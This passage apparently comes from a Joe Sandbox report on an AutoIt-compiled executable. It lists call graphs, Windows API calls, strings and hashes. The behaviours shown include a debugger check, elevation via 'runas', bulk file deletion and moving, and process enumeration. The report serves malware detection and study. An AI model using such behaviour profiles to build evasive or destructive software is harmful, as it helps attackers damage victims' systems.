103715->103716 103717 521207 59 API calls 103716->103717 103718 52fea6 103717->103718 103719 521207 59 API calls 103718->103719 103720 52feb1 103719->103720 103721 5210c3 59 API calls 103720->103721 103722 52febc 103721->103722 103723 530f16 Mailbox 59 API calls 103722->103723 103724 52fec3 RegisterWindowMessageW 103723->103724 103724->103674 103727 52fd66 103726->103727 103728 565ff1 103726->103728 103729 530f16 Mailbox 59 API calls 103727->103729 103745 579f97 59 API calls 103728->103745 103731 52fd6e 103729->103731 103731->103678 103732 565ffc 103733->103685 103734->103687 103746 577615 65 API calls 103734->103746 103736 521207 59 API calls 103735->103736 103737 5302fa 103736->103737 103738 521207 59 API calls 103737->103738 103739 530302 103738->103739 103740 521207 59 API calls 103739->103740 103741 53024e 103740->103741 103741->103691 103743 521207 59 API calls 103742->103743 103744 5210cb 103743->103744 103744->103705 103745->103732 103747 519a88 103750 5186e0 103747->103750 103751 5186fd 103750->103751 103752 550edd 103751->103752 103753 550f28 103751->103753 103768 518724 103751->103768 103756 550ee5 103752->103756 103759 550ef2 103752->103759 103752->103768 103785 58a898 290 API calls __cinit 103753->103785 103754 515278 59 API calls 103754->103768 103783 58aeac 290 API calls 103756->103783 103757 532ea0 __cinit 67 API calls 103757->103768 103775 51898d 103759->103775 103784 58b354 290 API calls 3 library calls 103759->103784 103762 5511b9 103762->103762 103763 513c30 68 API calls 103763->103768 103764 5510df 103787 58ac03 89 API calls 103764->103787 103765 513f42 68 API calls 103765->103768 103768->103754 103768->103757 103768->103763 103768->103764 103768->103765 103769 518a17 103768->103769 103770 5139be 68 API calls 103768->103770 103773 51523c 59 API calls 103768->103773 103768->103775 103776 5153b0 290 API calls 103768->103776 103777 521c9c 59 API calls 103768->103777 103779 513938 68 API calls 103768->103779 103780 51855e 290 API calls 103768->103780 103781 5184e2 89 API calls 103768->103781 103782 51835f 290 API calls 103768->103782 103786 56718e 59 API calls 103768->103786 103770->103768 103773->103768 103775->103769 103788 57a2fa 89 API calls 4 library calls 103775->103788 103776->103768 103777->103768 103779->103768 103780->103768 103781->103768 103782->103768 103783->103759 103784->103775 103785->103768 103786->103768 103787->103775 103788->103762 103789 519a6c 103792 51829c 103789->103792 103791 519a78 103793 5182b4 103792->103793 103800 518308 103792->103800 103794 5153b0 290 API calls 103793->103794 103793->103800 103798 5182eb 103794->103798 103796 550e08 103796->103796 103797 518331 103797->103791 103798->103797 103799 51523c 59 API calls 103798->103799 103799->103800 103800->103797 103801 57a2fa 89 API calls 4 library calls 103800->103801 103801->103796 103802 54db8a 103803 530f16 Mailbox 59 API calls 103802->103803 103804 54db91 103803->103804 103806 530f16 Mailbox 59 API calls 103804->103806 103807 54dbaa _memmove 103804->103807 103805 530f16 Mailbox 59 API calls 103808 54dbcf 103805->103808 103806->103807 103807->103805 103809 5138ce 103810 5138f9 103809->103810 103811 5138d8 103809->103811 103817 54d282 103810->103817 103818 566afa 59 API calls 103810->103818 103812 513b31 59 API calls 103811->103812 103813 5138e8 103812->103813 103815 513b31 59 API calls 103813->103815 103816 5138f8 103815->103816 103818->103810

                          Executed Functions

                          Function 00525240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                          • IsDebuggerPresent.KERNEL32 ref: 0052527E
                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0051BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00560AAE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00560AE6
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C5230), ref: 00560B69
                          • ShellExecuteW.SHELL32(00000000), ref: 00560B70
                            • Part of subcall function 0052514C: GetSysColorBrush.USER32(0000000F), ref: 00525156
                            • Part of subcall function 0052514C: LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                            • Part of subcall function 0052514C: LoadIconW.USER32(00000063), ref: 0052517C
                            • Part of subcall function 0052514C: LoadIconW.USER32(000000A4), ref: 0052518E
                            • Part of subcall function 0052514C: LoadIconW.USER32(000000A2), ref: 005251A0
                            • Part of subcall function 0052514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                            • Part of subcall function 0052514C: RegisterClassExW.USER32(?), ref: 0052521C
                            • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                            • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                            • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 0052513E
                            • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 00525147
                            • Part of subcall function 005259D3: _memset.LIBCMT ref: 005259F9
                            • Part of subcall function 005259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                          Strings
                          • runas, xrefs: 00560B64
                          • AutoIt, xrefs: 00560AA3
                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00560AA8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                          • API String ID: 529118366-2030392706
                          • Opcode ID: f35754c470590cdd1da6bdbd377779971c8b956c3ce9fa4a80557cbd155daeb9
                          • Instruction ID: 11a1718e7832c7a1a995a35dc8921065a0aaaa081d56c847c68b67e1859ce21c
                          • Opcode Fuzzy Hash: f35754c470590cdd1da6bdbd377779971c8b956c3ce9fa4a80557cbd155daeb9
                          • Instruction Fuzzy Hash: B051253490425AAACB21EBB4EC49EFE7F78BFAA340B045067F451621E2EB745549DB20
                          Function 00573B4F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1153 573b4f-573bb5 call 521207 * 4 call 5301af * 2 call 574def call 574e59 1170 573bb7-573bbb call 521900 1153->1170 1171 573bc0-573bca call 574e59 1153->1171 1170->1171 1175 573bd5-573c13 call 521207 * 2 call 530044 FindFirstFileW 1171->1175 1176 573bcc-573bd0 call 521900 1171->1176 1184 573d21-573d28 FindClose 1175->1184 1185 573c19 1175->1185 1176->1175 1187 573d2b-573d63 call 521cb6 * 6 1184->1187 1186 573c1f-573c21 1185->1186 1186->1184 1188 573c27-573c2e 1186->1188 1190 573cf5-573d08 FindNextFileW 1188->1190 1191 573c34-573c8c call 521a36 call 5743ce call 521cb6 call 521c9c call 5217e0 call 521900 call 573f97 1188->1191 1190->1186 1195 573d0e-573d13 1190->1195 1218 573c8e-573c91 1191->1218 1219 573cad-573cb1 1191->1219 1195->1186 1220 573c97-573ca9 call 52151f 1218->1220 1221 573d18-573d1f FindClose 1218->1221 1222 573cb3-573cb6 1219->1222 1223 573cdf-573ce5 call 573d64 1219->1223 1231 573cbb-573cc4 MoveFileW 1220->1231 1234 573cab DeleteFileW 1220->1234 1221->1187 1226 573cc6-573cd6 call 573d64 1222->1226 1227 573cb8 1222->1227 1229 573cea 1223->1229 1226->1221 1235 573cd8-573cdd DeleteFileW 1226->1235 1227->1231 1232 573ced-573cef 1229->1232 1231->1232 1232->1221 1236 573cf1 1232->1236 1234->1219 1235->1232 1236->1190
                          APIs
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00573C03
                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00573CAB
                          • MoveFileW.KERNEL32(?,?), ref: 00573CBE
                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00573CDB
                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00573CFD
                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00573D19
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 4002782344-1173974218
                          • Opcode ID: fb5a45cfb64f74325089b3d430a80f646b186cedcb9d343981698b4da858eeb7
                          • Instruction ID: de10e648fd255af1fdc0d7360f93db0c7ab73ca68f9aa18d032866172b9ad110
                          • Opcode Fuzzy Hash: fb5a45cfb64f74325089b3d430a80f646b186cedcb9d343981698b4da858eeb7
                          • Instruction Fuzzy Hash: 0A51853180111E9ACF15EBA0EA5A9EEBB79BF61310F204165E446B30D1EF315F09EB64
                          Function 00525D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1287 525d13-525d73 call 521207 GetVersionExW call 521821 1292 525e78-525e7a 1287->1292 1293 525d79 1287->1293 1294 560f29-560f35 1292->1294 1295 525d7c-525d81 1293->1295 1296 560f36-560f3a 1294->1296 1297 525d87 1295->1297 1298 525e7f-525e80 1295->1298 1300 560f3c 1296->1300 1301 560f3d-560f49 1296->1301 1299 525d88-525dbf call 521981 call 52133d 1297->1299 1298->1299 1310 525dc5-525dc6 1299->1310 1311 561018-56101b 1299->1311 1300->1301 1301->1296 1302 560f4b-560f50 1301->1302 1302->1295 1304 560f56-560f5d 1302->1304 1304->1294 1306 560f5f 1304->1306 1309 560f64-560f6a 1306->1309 1312 525e00-525e17 GetCurrentProcess IsWow64Process 1309->1312 1313 560f6f-560f7a 1310->1313 1314 525dcc-525dcf 1310->1314 1315 561034-561038 1311->1315 1316 56101d 1311->1316 1317 525e19 1312->1317 1318 525e1c-525e2d 1312->1318 1321 560f97-560f99 1313->1321 1322 560f7c-560f82 1313->1322 1314->1312 1323 525dd1-525def 1314->1323 1319 561023-56102c 1315->1319 1320 56103a-561043 1315->1320 1324 561020 1316->1324 1317->1318 1329 525e98-525ea2 GetSystemInfo 1318->1329 1330 525e2f-525e3f call 5255f0 1318->1330 1319->1315 1320->1324 1328 561045-561048 1320->1328 1326 560fbc-560fbf 1321->1326 1327 560f9b-560fa7 1321->1327 1331 560f84-560f87 1322->1331 1332 560f8c-560f92 1322->1332 1323->1312 1325 525df1-525df7 1323->1325 1324->1319 1325->1309 1333 525dfd 1325->1333 1337 560fe5-560fe8 1326->1337 1338 560fc1-560fd0 1326->1338 1334 560fb1-560fb7 1327->1334 1335 560fa9-560fac 1327->1335 1328->1319 1336 525e65-525e75 1329->1336 1344 525e41-525e4e call 5255f0 1330->1344 1345 525e8c-525e96 GetSystemInfo 1330->1345 1331->1312 1332->1312 1333->1312 1334->1312 1335->1312 1337->1312 1343 560fee-561003 1337->1343 1340 560fd2-560fd5 1338->1340 1341 560fda-560fe0 1338->1341 1340->1312 1341->1312 1346 561005-561008 1343->1346 1347 56100d-561013 1343->1347 1352 525e50-525e54 GetNativeSystemInfo 1344->1352 1353 525e85-525e8a 1344->1353 1348 525e56-525e5a 1345->1348 1346->1312 1347->1312 1348->1336 1351 525e5c-525e5f FreeLibrary 1348->1351 1351->1336 1352->1348 1353->1352
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00525D40
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • GetCurrentProcess.KERNEL32(?,005A0A18,00000000,00000000,?), ref: 00525E07
                          • IsWow64Process.KERNEL32(00000000), ref: 00525E0E
                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00525E54
                          • FreeLibrary.KERNEL32(00000000), ref: 00525E5F
                          • GetSystemInfo.KERNEL32(00000000), ref: 00525E90
                          • GetSystemInfo.KERNEL32(00000000), ref: 00525E9C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                          • String ID:
                          • API String ID: 1986165174-0
                          • Opcode ID: e4f59942ab11b3dbd885bfdd2d66f63f4701e30152ca42882756b638d221557c
                          • Instruction ID: e2415cd53889832803dee360d0e6755d5280ee0bd067b82086ef8b1dbd2094ed
                          • Opcode Fuzzy Hash: e4f59942ab11b3dbd885bfdd2d66f63f4701e30152ca42882756b638d221557c
                          • Instruction Fuzzy Hash: 4F918131549BD0DECB31CB7894545ABFFE5BF3A300B884A9ED0C697A81E230A648D759
                          Function 00573E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1395 573e72-573eb9 call 521207 * 3 call 5301af call 574e59 1406 573ebb-573ec4 call 521900 1395->1406 1407 573ec9-573efa call 530044 FindFirstFileW 1395->1407 1406->1407 1411 573efc-573efe 1407->1411 1412 573f69-573f70 FindClose 1407->1412 1411->1412 1413 573f00-573f05 1411->1413 1414 573f74-573f96 call 521cb6 * 3 1412->1414 1415 573f07-573f42 call 521c9c call 5217e0 call 521900 DeleteFileW 1413->1415 1416 573f44-573f56 FindNextFileW 1413->1416 1415->1416 1430 573f60-573f67 FindClose 1415->1430 1416->1411 1420 573f58-573f5e 1416->1420 1420->1411 1430->1414
                          APIs
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00573EE9
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00573F39
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573F4A
                          • FindClose.KERNEL32(00000000), ref: 00573F61
                          • FindClose.KERNEL32(00000000), ref: 00573F6A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          • Opcode ID: ad169d24dcfaf16af13c470e7f4189443553b0fe8ae4cb5e15586100685619a2
                          • Instruction ID: da6c1b9ed9f90b132aad784eccaa9c91cc6f7870a8c8c9a3d5123c9b3b03c196
                          • Opcode Fuzzy Hash: ad169d24dcfaf16af13c470e7f4189443553b0fe8ae4cb5e15586100685619a2
                          • Instruction Fuzzy Hash: 7331A4750183569BC300EF64E8999AFBBA8BEE2310F404E1DF4D5921D1DB24DA08E756
                          Function 0051B020 Relevance: 8.1, APIs: 3, Strings: 1, Instructions: 1146COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00523740: CharUpperBuffW.USER32(?,005D61DC,00000001,?,00000000,005D61DC,?,005153A5,?,?,?,?), ref: 0052375D
                          • _memmove.LIBCMT ref: 0051B68A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpper_memmove
                          • String ID: pr]
                          • API String ID: 2819905725-2741208959
                          • Opcode ID: af474c46dd024adce50c02d3b3825844badb55a4dc74a6a88ba44371cb551784
                          • Instruction ID: 5d7af61a5e44db4f10b03ee4e5c9073cfc825f96721f464869d9184f4c374884
                          • Opcode Fuzzy Hash: af474c46dd024adce50c02d3b3825844badb55a4dc74a6a88ba44371cb551784
                          • Instruction Fuzzy Hash: F8A26974608741DFE720DF14C494BAABBE1BF88304F14895EE89A8B361D771ED85CB92
                          Function 00573FB5 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00573FDA
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
                          • Process32NextW.KERNEL32(00000000,?), ref: 00574008
                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 005740B2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: ca88f6cad6991e0dec1466decba1a0be333195da85225403d59d7a7e936a1bf2
                          • Instruction ID: 42fbd3b86ff7e16cda3dfe377e1891db5f2280ae9965f1e2ded5a911021f7150
                          • Opcode Fuzzy Hash: ca88f6cad6991e0dec1466decba1a0be333195da85225403d59d7a7e936a1bf2
                          • Instruction Fuzzy Hash: 753159711043019FD304EF54D889AAFBFE8BFE5350F40492DF585861E1EB719949DB92
                          Function 005747B7 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(?,0055FC06), ref: 005747C7
                          • FindFirstFileW.KERNEL32(?,?), ref: 005747D8
                          • FindClose.KERNEL32(00000000), ref: 005747E8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          • Opcode ID: 78ca5b3ab1c18e61667bb183bfc1acd8210776c32b89bb2f54eb3bed56625243
                          • Instruction ID: 51e28341481c442daea08045a0cee0d3fb5f0d5c509f20f63158269df4bcccbf
                          • Opcode Fuzzy Hash: 78ca5b3ab1c18e61667bb183bfc1acd8210776c32b89bb2f54eb3bed56625243
                          • Instruction Fuzzy Hash: AFE0D8314206119743146738FC4D4EA3B5CEE17335F108B15F536C11D0EB709D47A995
                          Function 005194E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2e7a9d5460390462121cfffb20df9f6ebecb70992d5a227431e83f3bfc2c0e4
                          • Instruction ID: 80fc8a539a433fce1d19277d1b53f063068c01585e0b160aa1dd2cc1d2e683c7
                          • Opcode Fuzzy Hash: c2e7a9d5460390462121cfffb20df9f6ebecb70992d5a227431e83f3bfc2c0e4
                          • Instruction Fuzzy Hash: C722AF74A00206DFEB24DF54C4A4AEEBBF1FF45300F14846AE856AB391E734A9C5CB91
                          Function 00530D68 Relevance: 3.1, APIs: 2, Instructions: 94nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNEL32 ref: 00530E05
                          • NtResumeThread.NTDLL ref: 00530E17
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotificationResumeThread
                          • String ID:
                          • API String ID: 177874822-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: abe712e57487a4fc5b464327eac429f794525a619fb04cf16b62995c75c2749a
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: FE31D474A00205DBCB58DF58C4A0969FBA6FB49310F689AA5E40ACF296D730EDD1DBC0
                          Function 0051BC70 Relevance: 57.4, APIs: 22, Strings: 10, Instructions: 1379sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 0051BF57
                            • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • Sleep.KERNEL32(0000000A,?,?), ref: 005535E5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL$pr]$pr]$pr]$pr]
                          • API String ID: 1792118007-2847968208
                          • Opcode ID: c4067e18ebab6985b10902cfc64ac3bda47aae036fc1ef8a2337d687395c9043
                          • Instruction ID: 89ed209b1ab9d307e17ea1df5b4b3082b121ca11c42adc3c8732d6d9c3b1db2e
                          • Opcode Fuzzy Hash: c4067e18ebab6985b10902cfc64ac3bda47aae036fc1ef8a2337d687395c9043
                          • Instruction Fuzzy Hash: 1DC29370508342DFE724DF24C858BAABFE4BF85344F14491EF899972A1D771E989CB82
                          Function 005133E5 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00513444
                          • RegisterClassExW.USER32(00000030), ref: 0051346E
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                          • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                          • LoadIconW.USER32(000000A9), ref: 005134C2
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
